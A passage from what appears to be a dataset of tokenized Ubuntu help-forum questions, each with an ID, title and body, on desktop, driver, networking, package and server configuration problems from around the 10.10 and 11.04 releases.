states ... done writing extended state information ... done package dependencies can not be resolved
34288	php does not parse using nginx & phpfm	i am setting up a vps and followed the nginx , php , mysql instructions for wordpress from this tutorial http : //tutspundit.com/howto-install-nginx-php-fpm-mysql-php533-wordpress-ubuntu-part-1/ and then http : //tutspundit.com/how-to-install-nginx-php-fpm-mysql-php533-wordpress-part-2/ the problem is the php file returns the php code itself in the browser without parsing it . so what did i miss ? update : staring phpfpm or nginx works fine but i think nginx is n't aware of phpfm at all , some link is missing perhaps ? i checked nginx error logs but there is nothing related to php . i ca n't seem to figure out what is missing .
34292	networkmanager quits randomly causing disruption to the internet connection	i am using ubuntu 10.10 maverick , and i have this problem where the networkmanager just quits randomly causing the internet connection to be broken . the only way to get it back is to log-off or restart the computer . this is very annoying as you have to close all the work you are doing and log-off or restart the computer . the networkmanager icon in the panel is not visible anymore when it quits as shown in the screenshot here . however the hardware icon for the wireless is still on which shows that this is a software problem . has anyone else experienced this problem ? is there a command or something to restart the networkmanager applet when it quits ?
34293	how do i add the system monitor applet to unity ?	prior to using unity , i had several gnome panel applets running in a panel . i used the dictionary applet , and the system monitor applet , among others . while the general `` systray '' area has been replaced by the `` indicator '' area , and my gnome panel launchers were migrated to unity launchers , there does n't seem to be an analogy to the more general `` panel applets '' from the prior gnome ui . i can live without the dictionary applet , but none of the system monitors written for the indicator area are nearly as useful and complete as the system monitor applet from the gnome panel . how do i get that applet running within my unity environment ?
34295	keyboard and touchpad do not work after upgrade	today i made an update of my ubuntu 11.04 installation . after rebooting the keyboard and touchpad of my asus eeepc do not work anymore . i can only login with the onscreen keyboard . seems to be a unity problem . never had this problem before . how can i make my keyboard work again ? after upgrading i also run the following command : sudo apt-get autoremove
34296	why does deleting a file on a usb stick not free up space ?	i have an hp pen-drive that has 16gb space . if i add a file to it , and then i delete that file , the free space of that deleted file does n't get applied . the only way i 've found to see that space as available again is by deleting the partition and doing it all over again ! why is this ? any clue ? i 've used kde partition manager to create the ntfs partition .
34297	galaxy s not detected , how do i make it work ?	can anyone please provide the necessary steps to connect a samsung galaxy s with ubuntu 10.10 please ? i was thinking that perhaps it could detect something , but it does n't , anyone succeeded ? thanks
34299	dell vostro 3400 reboots instead of shutting down	well the title says it all . after the gui button of shutdown responded to reboot . i have tried all the command there is but every time i shut down my laptop it reboots . i tried sudo halt sudo poweroff sudo shutdown -h now i have a dell vostro 3400 with i3 and 4 gb ram if that matters . has anyone faced this problem . it was doing fine with 10.10 edit : ok , seems like i can confine the problem to prevail during laptop usage from ac only rather than battery . as suggested i tried updating bios with the help of this but couldnot succeed .
34300	gnome-open confused : could not display `` /home/msw/anything ''	my trusted friend gnome-open ( which i call go for short ) has ceased working . it interprets any argument given to it as a directory and will not recognize anything else . i have traced out the somewhat indirect path connecting the gnome menu system which in turn relies upon the xdg subsystem which requires /etc/gnome/defaults.list , /usr/share/application/mimeinfo.cache which itself is generated by update-mime-database ( 1 ) which requires that $ xdg_config_dirs and $ xdg_data_dirs be set properly . everything seems in order and yet mime-type recognition is not working . this would be tolerable from the shell ( because i usually know the mime-type of the file i want to open ) , but applications like chrome can not launch anything properly . i 'm sure i 've missed something , and this is on a machine under daily desktop use that was recently updated to natty beta 1 ( and is current to the repos as of one hour ago ) . i do n't know that the gnome-open failure was caused by the upgrade or followed it during some package installation .
34306	theme does n't work . gnome looks bad	i reinstalled my ubuntu box with 10.10 ( after my dabbing of 11.04 turns out to be a futile experience ) . the box is clean . i install the typical packages ( google chrome , dropbox , build-essentials , ... ) . however , now whenever i login into gnome . the gnome panels and decorations look weird . they do n't like they have the ambience theme on . even if i choose the ambience theme of ubuntu , the theme is not applied . currently my desktop looks very ugly . all i want is my default ubuntu looks back .
34307	known chrome/chromium themes that match popular themes	searching for themes for chromium i found this : http : //www.omgubuntu.co.uk/2010/03/6-google-chrome-ubuntu-themes-radiance-ambiance-elementary-dust-etc/ can you guys point to some other chrome/chromium themes that fit popular themes ? here are some themes i like , but could not find fitting chromium themes for : minty-freshness victory hope the equinox pack others are welcome as well . share plenty ! ( for some reason , the omg u comment section in the link is off . i bet there were a bunch of comments on this one : ) )
34308	where is inittab file ?	hi i 'm on ubuntu 10.10 , and i 've just joined linux world from os/x-apple . i 'm learning about runlevels and rc directory in /etc/ and everywhere ( manuals , tutorials , etc ) i 'm reading about inittab . but i do n't find it in my ubuntu.. why ? does ubuntu follow runlevel model ? how rc and levels are loaded without inittab ?
34311	macbook air 11 '' ( late 2010 ) touchpad/trackpad does n't work	just upgraded my macbook air 3,1 ( 11 '' late 2010 ) from maverick to natty beta 1 . trackpad stopped working . any idea why this happened and how to fix this ?
34313	battery recognized and 100 % charged but not working	i 'm stumped . brand new to linux , the battery became disabled while i had vista running on my lenovo z61t . it worked fine until vista demanded i buy another license , i imagine the disabling of the battery is a tactic used by windows to put additional pressure on the person why may be using a non-legitimate copy of their os . that was the last straw , i installed ubuntu thinking it may take care of the problem . love the new os but the battery issue persists . any benevolent suggestions ?
34320	is there a way to install globalmenu on lxde or openbox ?	is there a way to install gnome-globalmenu on openbox ? i love minimal linux distro and apps , i do n't want to use gnome or kde ...
34325	is there an user activity monitor/alarm ?	there once was a tool called active work tracker for windows from brigsoft . what it basically did was to monitor user activity , sound alarm after a predefined period ( say 60 minutes ) , wait another predefined time ( say 5 minutes ) when user was supposed to take a break ( which was recognized as lack of activity ) , and repeat the whole procedure . in addition , it recorded the total time user spends on his computer and presented nice charts . i wonder whether there is a similar application for ubuntu ? you can see more detailed description of active work tracker at http : //www.abstime.com/bsactivity/
34326	mounting shared folders in domain using active directory authentication at login	i have windows server 2008 set up with ad . have set up the group policies to map two communal folders and a user folder ( the user folder using a logon script ) . i 've joined the ubuntu machine to the domain and can access the shares and mount them , but would like to mount them when the user logs on . i know it 's possible to put the username and password in fstab but would like to just use ad as it does when navigating through the files . is creating a .smbcredentials file for each user the only option ? also , i 'm using likewise open to authenticate . thanks
34329	su command + authentication failure	i am having problems with the su command . i know my password and i am typing it correctly but su indicates authentication failure . so i checked on the internet and then went into recovery mode and changed my username 's password to what i was entering before . even now entering the same password on su gives me authentication failure . please suggest what am i doing wrong ? ?
34334	i ca n't install the ndiswrapped wg311v3 drivers	the instructions here - https : //help.ubuntu.com/community/wifidocs/device/netgear_wg311_v3 - work super well if you are using the i386 kernel , but i installed with wubi which automatically selected the amd64 kernel even though i 'm pretty sure my pc is not 64bit . the thing is is that the driver will showed up as installed in my ndiswrapper -l list but sudo modprobe ndiswrapper never amounts to anything . is there anything else i can try ? fixed ! finally got workable status using a marvell driver from a german site ! http : //forum.ubuntuusers.de/topic/verbindungsprobleme-mit-wlan-marvel-8339-libe/ # post-1888522 then from there all i did was : sudo ndiswrapper -r wg311v3 sudo ndiswrapper -i ( the marvell.inf ) sudo modprobe ndiswrapper et voila !
34335	why do i have to unlock my private key to perform a download operation ?	i do n't understand why i must be identified - anyone can download this branch . i get the same prompt when i upload to launchpad - that makes far more sense to me . anyone know why bzr does this ?
34338	error while configuring python in apache2	i was trying to configure python to apache2 as suggested by http : //ubuntuforums.org/showthread.php ? t=91101 first downloaded and installed and enabled mod_python module changed /etc/apache2/sites-available/default as specified < directory /var/www/ > options indexes followsymlinks multiviews allowoverride authconfig order allow , deny allow from all addhandler mod_python .py pythonhandler mod_python.publisher pythondebug on # uncomment this directive is you want to see apache2's # default start page ( in /apache2-default ) when you go to / # redirectmatch ^/ $ /apache2-default/ < /directory > created test.py in my /var/www and restarted apache . getting 404-not found error for localhost/test.py on my error.log i have [ sun apr 10 14:07:04 2011 ] [ notice ] mod_python ( pid=5591 , interpreter='localhost.localdomain ' ) : importing module '/var/www/test.py' i am using ubuntu-10.10 . anyone any ideas ? ? ? update
34340	how to stop orca from running when i open sound preferences ?	i have this bizarre problem . whenever i open sound preferences from indicator-sound in natty the orca speech-dispatcher runs in a terminal in a loop mode . i can not close the terminal neither can i kill the process . i do n't know what gnome-orca does except for it being a visual assistant application . has anyone else faced this problem ? ?
34342	custom daemon script : works , but does not run at boot / startup	this is ubuntu 10.10 maverick . i have the following shell script in init.d that i want to run as a `` daemon '' ( background service with start/stop/restart really ) at system startup . there is a symlink in rc3.d . i tried 4 and 5 too . ( ideally this would initialize before graphical login happens and before a user logs in . ) important : the script works 100 % as expected and required when testing this with service metaleapdaemon start and service metaleapdaemon stop . ( this shell script calls a python program which makes sure the appropriate .pid files are both created at startup and deleted at exit . ) so generally it works fine but now my only issue is why it will not be run at any of the run-levels i tried . i know for sure it is n't run because the log file it normally creates does not get created . as you can see ( by the lack of any uid : gid args in the start-stop-daemon commands ) this would currently run only under root , is this forbidden in a default setup ? here 's the script , pretty much your run-off-the-mill daemon script really : # ! /bin/sh daemon=/opt/metaleap/_core/daemon/metaleapdaemon.py name=metaleapdaemon desc= '' metaleapdaemon '' test -f $ daemon || exit 0 set -e case `` $ 1 '' in start ) start-stop-daemon -- start -- pidfile /var/run/ $ name.pid -- exec $ daemon ; ; stop ) start-stop-daemon -- stop -- pidfile /var/run/ $ name.pid ; ; restart ) start-stop-daemon -- stop -- pidfile /var/run/ $ name.pid sleep 1 start-stop-daemon -- start -- pidfile /var/run/ $ name.pid -- exec $ daemon ; ; * ) n=/etc/init.d/ $ name echo `` usage : $ n { start|stop|restart } '' > & 2 exit 1 ; ; esac exit 0
34343	can i reprogram mouse-keys ?	i do n't use the mouse a lot so i just use the mouse keys ( microsoft 's nomenclature ) when i need to click something . the problem is i can never remember whether i am in left-click or right-click mode . would it be possible , for example , to get it to revert to left-click modeafter every right-click or middle-click ?
34344	keeping menus clean when using both kde and gnome	if i want to install kde alongside gnome how can i keep kde apps out of the menu when i am in gnome and gnome apps out of the menu when i am in kde ?
34345	home button icon missing in unity 2d	the ubuntu icon in the top left is missing in unity 2d . any ideas how to get it to appear . this is on my other pc running nvidia 6150se / nforce 430 gpu which does n't work very well with unity 3d .
34346	sendto : permission denied error	when i run ping program i get the following error : sendto : permission denied even though i had done su . what could be the possible reason ? thanks in advance
34347	atheros wifi works on one desktop computer but not another	my wifi card worked on my old desktop fine but is not working whe i moved it to my new one . here is the output of sudo lshw -c network -network unclaimed description : ethernet controller product : atheros communications inc. vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=32 resources : memory : fb200000-fb20ffff and sudo lspci 00:00.0 host bridge : intel corporation sandy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation sandy bridge pci express root port ( rev 09 ) 00:16.0 communication controller : intel corporation cougar point heci controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation cougar point usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation cougar point high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation cougar point pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 82801 pci bridge ( rev b5 ) 00:1c.3 pci bridge : intel corporation cougar point pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation cougar point pci express root port 5 ( rev b5 ) 00:1d.0 usb controller : intel corporation cougar point usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation cougar point lpc controller ( rev 05 ) 00:1f.2 ide interface : intel corporation cougar point 4 port sata ide controller ( rev 05 ) 00:1f.3 smbus : intel corporation cougar point smbus controller ( rev 05 ) 00:1f.5 ide interface : intel corporation cougar point 2 port sata ide controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation device 0de1 ( rev a1 ) 01:00.1 audio device : nvidia corporation device 0bea ( rev a1 ) 03:00.0 pci bridge : device 1b21:1080 ( rev 01 ) 04:00.0 ethernet controller : atheros communications inc. device ff1a ( rev 01 ) 05:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) and sudo iwconfig lo no wireless extensions . eth0 no wireless extensions . and sudo ifconfig eth0 link encap : ethernet hwaddr 6c:62:6d : e6:8f:6f inet addr:192.168.0.143 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6e62:6dff : fee6:8f6f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5772951 errors:0 dropped:0 overruns:0 frame:0 tx packets:5587811 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:996414964 ( 996.4 mb ) tx bytes:1604420754 ( 1.6 gb ) interrupt:44 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:60498 errors:0 dropped:0 overruns:0 frame:0 tx packets:60498 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:9892064 ( 9.8 mb ) tx bytes:9892064 ( 9.8 mb ) i totally have no idea what to do , or even what most of this means , any help at all to get my wifi working again would be appreciated . thanks ! ash
34348	cabal install readline ask readline not found error	how to cabal install readline in ubuntu 10 resolving dependencies ... configuring readline-1.0.1.0 ... checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for gnureadline.framework ... checking for readline ... no checking for tputs in -lncurses ... no checking for tputs in -ltermcap ... no checking for tputs in -lcurses ... no checking for rl_readline_version ... no configure : error : readline not found , so this package can not be built see `config.log ' for more details . cabal : error : some packages failed to install : readline-1.0.1.0 failed during the configure step . the exception was : exitfailure 1
34354	eclipse ( aptana-studio ) - strange transparency areas on the ide	i have no idea how to explain you what do i mean , but take a look at the screenshot , as it might allow you to understand my situation a bit better : screenshot here i am using ubuntu 10.04 i386 . does anyone have any idea how could i have caused this , and how can i fix it ? just a note , i 've had tried to install some custom color schemes for eclipse manually , but at that time i have n't experienced such issues ...
34356	user permissions	is there any way with which , using shell scripts , i can execute a program as another user , in a uniquely ( randomly ) named directory , where the user has rwx access to all the files in that directory , but can not change anything outside it . i.e . when a program is executed using this script in a folder , it can only access files inside the folder and can not change any system settings or navigate outside this folder
34357	how do i hibernate with s2disk from the menu ?	i can hibernate my system with command `` sudo s2disk '' . now i 'd like to call this from gnome menu with clicking on `` hibernate '' . what i need to do ?
34359	xorg fails to load	live cd version works great but on the installation x crashes saying screens found but non have usable configuration . this is on an old pc .
34362	what is a good mysql manager ?	on windows , i use sqlyog . and i am new to ubuntu . is there a mysql manager programs as good as sqlyog ?
34368	finder freezes when deleting files across a os x/linux network	i have my macbook 5,2 hooked up to an ubuntu 10.10 'server ' via ethernet . i 've installed netatalk and avahi-daemon on the server . i 've disallowed spotlight ( os x 's search utility ) from indexing the networked drives . everything works as it should , however , from time to time when i delete files that reside on the ubuntu server from my macbook , finder ( os x 's file manager ) will freeze . i can kill the finder process . i then try to restart it from the terminal in this way : open /system/library/coreservices/finder.app but this does n't work . the following error message is printed in the terminal : lsopenurlswithrole ( ) failed with error -10810 for the file /system/library/coreservices/finder.app . the only solution i know of at present is to reboot the macbook . so i guess i need to know what my options are here . is it better for me to use smb ? or is there a config file i can alter ? i have a feeling this bug may be linked to certain disallowed characters in file or pathnames as it does n't happen all the time , although this is just a hunch . has anyone else experienced this bug ? cheers . ps : i 've posted this question almost verbatim at apple.stackexchange too . is this a no-no ? if so i can remove the question from here but i think it has enough to do with ubuntu to be a valid question .
34369	how do i turn off the laptop screen while using an external monitor ?	when i close my laptop lid , all my screens are turned off ( my laptop screen and my lg m237wa monitor ) . i 'd like to know how do i make it turn off only the laptop screen and keep the monitor on ( i want that behaviour for when i want to watch a movie on my monitor and do n't want any brightness coming for the laptop screen ) . i 'm using a hp pavilion dv4-1290br , which comes with a nvidia geforce 8400m gts . i 'm using the nvidia driver and it 's working perfectly . for my x settings , i 'm using twinview , my laptop is set to 1280x800 and my monitor to 1920x1080 . i hope you guys can help me , for i could n't find anything so far . thank you very much .
34372	how to play a webm video file ?	i have tried vlc , banshee and totem but none of them recognize the webm format . even the system does not recognize its mime-type . how do i play it ?
34379	anthy bar does n't show up	i installed all the anthy ibus packages and changed my japanese language settings properly but the anthy bar does n't show up when i press ctrl+space . i tried changing the shortcut in the ibus preferences section but it still does n't work . i have japanese as my system 's default language and up to 2 days ago , anthy worked just fine ( the bar showed up when i pressed ctrl+space ) but then it suddenly stopped working . i tried to uninstall anthy and installing it again , all to no avail . what could be the problem ?
34380	cached remote filesystem mount ?	i have a large directory of pictures on a debian server that i 'd like to frequently access and update on my ubuntu ( maverick ) laptop . i can mount this directory remotely , but even over gigabit ethernet , it 's much slower than if it were local . is there a way to mount this that could pre-cache 100 % of the content , ( using the local copy if it 's up to date ) and allow writes back to the source filesystem ?
34381	how do i wget a file from any machine on the network ?	i have more than 100 systems running ubuntu . i have a configuration file in one of these systems say 172 ... 10 . can i get that configuration file from the other sytem say 172 ... 100 using wget ? i have installed wget ? and i have tried the following wget http : //172.* . *.10/name.conf but i am not able to get that file.can some one help ?
34383	desktop feels slow : ati x600 card 's fault ?	i am using ubuntu ( well , kubuntu to be precise ) and my kde desktop feels slow . scrolling is especially slow in kate , windows switching is slow , firefox is really slow . i have direct rendering enabled using the r300 driver , which has been setup automatically by the installer . the computer is a bit old , but it used to be quite fast at the times i could use the proprietary ati-drivers ( which dropped support for my card ) . how can i test if there is something misconfigured ? i used to use xglgears for that , but it outputs the code below : running synchronized to the vertical refresh . the framerate should be approximately the same as the monitor refresh rate . 300 frames in 5.0 seconds = 59.872 fps is there anything i can do , or should i just change the video card ? anything you could recommend ?
34389	what could i use instead of the gnome panel applet `` character palette '' in unity	as there is nothing like gnome panel applets in unity , i would like to ask about some possibility to supercede the `` character palette '' , a function that i used a lot for comfortable embedding of special chars .
34390	problem installing cabal-1.8.0.2	i am running ubuntu 10.10 , ghc 6.12.1 , gcc 4.4.5 . i am trying to install nikki and the robots . when i do cabal install it fails to install cabal-1.8.0.2 . cabal-1.8.0.2 already exists in ~/.cabal/lib . if i run cabal install -- dry-run -v , it will say : in order , the following would be installed : cabal-1.8.0.2 ( reinstall ) changes : unix-2.4.0.0 - > 2.4.2.0 cabal-macosx-0.1.1 ( new package ) nikki-0.2.20 ( new package ) cabal fail to install with : /home/tyr/.cabal/lib/unix-2.4.2.0/ghc-6.12.1/libhsunix-2.4.2.0.a ( signals.o ) : in function `spzw_info ' : ( .text+0x4d14 ) : undefined reference to `rtstimersignal' collect2 : ld returned 1 exit status cabal : error : some packages failed to install : cabal-1.8.0.2 failed during the configure step . the exception was : exitfailure 1 how do i fix this ? i have tried renaming the .cabal folder to force it to reinstall , but it still fails .
34391	virtual midi piano keyboard setup	i installed virtual midi keyboard ( vmpk ) using apt-get install . i also have jack control and qsynth installed . when i open vmpk , i can not hear the sound coming from it . how can i do the setting to let the sound come out ?
34395	use ubuntu one account to purchase from 7digital website ?	is there a way to transfer 7digital account info to songbird on windows . i 've purchased music in ubuntu using banshee/7digital and now on win7/songbird i ca n't login . is the account for my ubuntu one different ? i 've tried all my email accounts with no luck . does ubuntu one have a special name i can log into ?
34400	how to show only opened apps in the current workspace on unity ?	i 've never been a `` workspace user '' but now i 'm starting to feel the need to separate my work.. is it possible , on unity , to only show apps on the running on the current workspace ? an example of what i 'm looking for would be : firefox is running on workspace 1 . i 'm on the 2nd and click on firefox . i get a new window instead of being sent back to the first workspace . i think this something similar was possible on classic gnome and maybe it works for unity too , however i do n't remember how .
34402	how to make folder writable to 2 users in different groups ?	i have a folder ( /var/www/test7.com ) , which must be readable/writable by www-data and test7 users . test7 user should not have access to other websites . how can i do that ?
34407	ca n't run xrdp , terminates unexpectedly	i ca n't run xrdp out of the box in ubuntu 10.04 . i run xrdp on a laptop and try to connect to it using window rdp client . it connect to rdp which prompt for a type of connection i tried any of them but all can ; t work it gives a connection error . i got the following in the log . [ 20110410-18:57:51 ] [ info ] scp thread on sck 5 started successfully [ 20110410-18:57:51 ] [ info ] granted ts access to user test [ 20110410-18:57:51 ] [ info ] starting xrdp session ... [ 20110410-18:57:51 ] [ info ] starting sessvc - xpid=7046 - wmpid=7045 [ 20110410-18:57:52 ] [ info ] session 7044 - user test - terminated any ideas ?
34408	how to add minecraft to the unity launcher ?	i 'm having trouble getting minecraft to launch when i add it to the launcher . if the game is running , i can right click on the icon in the launcher and select `` keep in launcher '' and the icon stays , but the game wo n't launch from it . if i create a launcher on the desktop , then drag that launcher to the unity launcher , the game will start . if i remove the launcher from the desktop , it stays in the unity launcher , but will not start any more . is there some way to add it to the unity launcher so that it will actually launch ? ( blech , i 've said launch far too many times . )
34409	unable to login to phpmyadmin with the root user	i have a root user in mysql-server on the ubuntu server . i am unable to login to phpmyadmin with the root user and password . i was trying to find the configuration file but could not locate it . help would be appreciated . thanks in advance
34410	how do i add a static quicklist for opera to open new tabs and windows ?	how can i add more options to opera 's quicklist such as : new tab , new private tab , new window , mail , etc ?
34415	how to add/restore workspace on the launcher ?	i seem to have lost the button on the unity panel ( left hand side panel ) in ubuntu 11.04 which shows you the desktops ( like compiz expo does ) think the button is just a shortcut for the expo compiz effect . but in any case , how do i get the button back ? it is called the workspaces switcher from what i could see from other mockups etc ... any help appreciated to get it back
34417	how do i configure an apple magic trackpad to use with unity ?	looking for some detailed document describing configuring apple magic trackpad with multitouch gestures . currently , unity runs with single finger tap as left click , 2 fingers tap as right click , 3 fingers tap as move window . how do i get right click and drag [ for firefox mouse gesture addon needs it ] ? . how do i get middle click ? is there way to configure 4 fingers and all other options . any pointer would help a lot . thanks .
34424	how do i install the native spotify application ?	has anyone managed to install spotify in ubuntu 11.04 beta ? the software source does n't appear to work , thus not allowing me to install it from their repository . if you know how to do it successfully , any help will be greatly welcomed : )
34429	how to encrypt a single folder on my external hard drive ?	i 'd like to encrypt a single folder in my external hard drive . which gui software should i use ?
34430	can i skip over releases when upgrading ?	i am currently using ubuntu 10.04 . i know there is a 10.10 release , but can i upgrade directly to 11.04 ? could you walk me through the steps please ?
34431	ubuntu software centre fails with package catalog error	i am running ubuntu 10.10 and was trying to reinstall indicator weather when i got this error message in the ubuntu software centre . it is shown in the screenshot below , i click repair , but the message keeps showing up . i closed the ubuntu software centre and tried again and get the same error message . here is the error message if it is not clear from the previous screenshot , edit 1 : on running sudo apt-get install aptitude it said i already had aptitude installed . then i ran sudo apt-get reinstall indicator-weather . the output was , indicator-weather is not currently installed , so it will not be reinstalled . indicator-weather is not currently installed , so it will not be reinstalled . the following packages will be removed : libgio-cil { u } 0 packages upgraded , 0 newly installed , 1 to remove and 0 not upgraded . need to get 0b of archives . after unpacking 274kb will be freed . do you want to continue ? i continued with a yes , but the problem still persists . edit 2 : i tried running sudo apt-get install indicator-weather but get the following error message . reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : indicator-weather : depends : gir1.2-glib-2.0 but it is not installable e : broken packages
34436	show playing song of last.fm in the sound notification panel	when i use rhythmbox , i see the currently played song in the sound notification area , is there some way to get the song that is playing on last.fm there ? i currently use the official last.fm program .
34439	software for converting various multimedia file formats ?	what is the best open source multimedia editing software around ? an app that can convert mp3 , mp4 , avi , flv , etc into various formats
34443	today 's dist-upgrade on natty	apt resulted few erronous lines on dist-upgrade . preparing to replace gir1.2-mutter-2.91 2.91.93-0ubuntu1~build1 ( using ... /gir1.2-mutter-2.91_3.0.0-0ubuntu1~build1_amd64.deb ) ... unpacking replacement gir1.2-mutter-2.91 ... dpkg : error processing /var/cache/apt/archives/gir1.2-mutter-2.91_3.0.0-0ubuntu1~build1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/mutter/meta-3.0.typelib ' , which is also in package gir1.2-mutter-3.0 3.0.0-0ubuntu1~build2 errors were encountered while processing : /var/cache/apt/archives/gir1.2-mutter-2.91_3.0.0-0ubuntu1~build1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) note . i have also installed gnome-shell , other desktops ( unity , classic ) does not load and report error ( could not load ths session etc . ) on login time . so using gnome-shell .
34447	how do i remove a file with 2 hypens in the name , like -- karmic.list	how can i read , write , or delete a file which has a name beginning with a pair of hyphens ? in my /etc/apt/sources.list.d/ there is a set of files whose name starts with -- karmic.list . when i try to rm or vim from the command line , it considers it as argument and reports as unknown arg . how can i deal with this ? how is it possible to select a file with this kind of name ?
34449	how to see the video card temperature ( nvidia , ati , intel ... )	is there a command ( via terminal ) to see the temperature of any video card . already tried sensors with the sensors-detect applied . does not detect for example , nvidia and ati video card temperatures .
34451	disable gdm on ubuntu netbook remix	i 'm running ubuntu netbook remix 10.10 ( on a pandaboard ) , and it does n't boot with grub ( so i ca n't pass it the 'text ' parameter at boot time ) . how do i disable gdm so it does n't start at boot ? there is no /etc/gdm/gdm.conf .
34452	how can i limit battery charging to 80 % capacity ?	i just learned that some lenovo laptops include a utility that offers to limit battery charging capacity to within 0â80 % in order to slow the attenuation of the battery lifespan : how can i do this in ubuntu ?
34456	are there any websense packages available ?	have anyone tried to use websense for squid in ubuntu ? update : i am looking at the possibility of using websense for web filtering . but websense officially supports only rhel+squid . i would like to know if websense will work with ubuntu ? if there are any websense installation packages for ubuntu or debian ? any manuals or howtos ?
34466	please suggest an application to convert photos to video	i need to convert some photos to video with all frames with special effects . video format can be mp4 , 3gp , or mpeg4 ... please suggest a good application which will convert fast .
34467	how to get serial number of my monitor ?	how can we get the serial number of monitor in ubuntu ?
34474	how do i handle .wim image files ?	i have an asus netbook , and its recovery partition and recovery dvd have several images in .wim format . are there any linux/ubuntu tools to handle those images ? im looking for the equivalents of dism , imagex , etc . but any tool ( gui or cli ) that could mount or extract or view its contents would be nice .
34477	how do i run a macro in the selenium ide without having to take my hands off the keyboard ?	i am looking for some form of utility that can be run from the command line in ubuntu that will click a button in a specific window . what i want to do is run a macro in the selenium ide without having to take my hands off the keyboard .
34479	internal hard disk mounting	i have a problem with mounting my internal hard disk in ubuntu.i have to manually mount it using /dev/mount/ '' name of disk '' during boot only then it gets mounted . i want to set it boot automatically . how do i do that ? thanks
34480	exception on desktop [ sic ! ] sun.awt.x11graphicsenvironment	i 'm trying to run different java-swing programs , which used to run before , but i ca n't start them from the commandline , without getting this error : java guessgame exception in thread `` main '' java.lang.noclassdeffounderror : could not initialize class sun.awt.x11graphicsenvironment at java.lang.class.forname0 ( native method ) at java.lang.class.forname ( class.java:186 ) at java.awt.graphicsenvironment.getlocalgraphicsenvironment ( graphicsenvironment.java:82 ) at sun.awt.x11.xtoolkit. < clinit > ( xtoolkit.java:112 ) at java.lang.class.forname0 ( native method ) at java.lang.class.forname ( class.java:186 ) at java.awt.toolkit $ 2.run ( toolkit.java:849 ) at java.security.accesscontroller.doprivileged ( native method ) at java.awt.toolkit.getdefaulttoolkit ( toolkit.java:841 ) at sun.swing.swingutilities2 $ aatextinfo.getaatextinfo ( swingutilities2.java:121 ) at javax.swing.plaf.metal.metallookandfeel.initcomponentdefaults ( metallookandfeel.java:1564 ) at javax.swing.plaf.basic.basiclookandfeel.getdefaults ( basiclookandfeel.java:147 ) at javax.swing.plaf.metal.metallookandfeel.getdefaults ( metallookandfeel.java:1599 ) at javax.swing.uimanager.setlookandfeel ( uimanager.java:530 ) at javax.swing.uimanager.setlookandfeel ( uimanager.java:570 ) at javax.swing.uimanager.initializedefaultlaf ( uimanager.java:1320 ) at javax.swing.uimanager.initialize ( uimanager.java:1407 ) at javax.swing.uimanager.maybeinitialize ( uimanager.java:1395 ) at javax.swing.uimanager.getdefaults ( uimanager.java:644 ) at javax.swing.uimanager.getstring ( uimanager.java:790 ) at javax.swing.uimanager.getstring ( uimanager.java:807 ) at javax.swing.joptionpane.showinputdialog ( joptionpane.java:476 ) at javax.swing.joptionpane.showinputdialog ( joptionpane.java:442 ) at io.input ( guessgame.java:10 ) at player.createplayer ( guessgame.java:26 ) at guessgame.init ( guessgame.java:52 ) at guessgame.main ( guessgame.java:85 ) i do n't show the source , because it used to run before , as well as a dozen other programs , and was n't changed . you might google for the error-message , and find the advice , to start java in headless mode . this does n't apply here , because there , the idea is , to do graphics stuff on a server , maybe to produce a chart or convert a graphic , which usually needs a display . then you may specify 'headless ' , because nothing get 's displayed on the server . here it is the opposite : i want my frame to be displayed , and i have a display=:0.0 , where my xterm ( xfce4 for instance ) is running . i even may start ecliplse from the menu . similar , the advice unset display does n't fit form me for the very same reason . i need to use the display , and it is up and responsive - i 'm using firefox right now on that machine . echo $ display :0.0 trying to run from a special input like the verve-comamndline does n't work either . it 's a mystery to me . xorg.0.log does n't show something interesting either .
